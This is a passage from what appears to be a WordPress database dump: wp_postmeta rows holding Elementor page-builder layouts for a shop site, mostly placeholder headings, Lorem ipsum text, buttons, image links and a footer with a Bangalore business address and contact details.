here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8335,1465,'_elementor_page_assets','a:0:{}'),(8337,1466,'_elementor_edit_mode','builder'),(8338,1466,'_elementor_template_type','wp-page'),(8339,1466,'_elementor_version','3.7.7'),(8340,1466,'_wp_page_template','elementor_canvas'),(8341,1466,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8342,1466,'_elementor_page_assets','a:0:{}'),(8353,1468,'_elementor_edit_mode','builder'),(8354,1468,'_elementor_template_type','wp-page'),(8355,1468,'_elementor_version','3.7.7'),(8356,1468,'_wp_page_template','elementor_canvas'),(8357,1468,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text 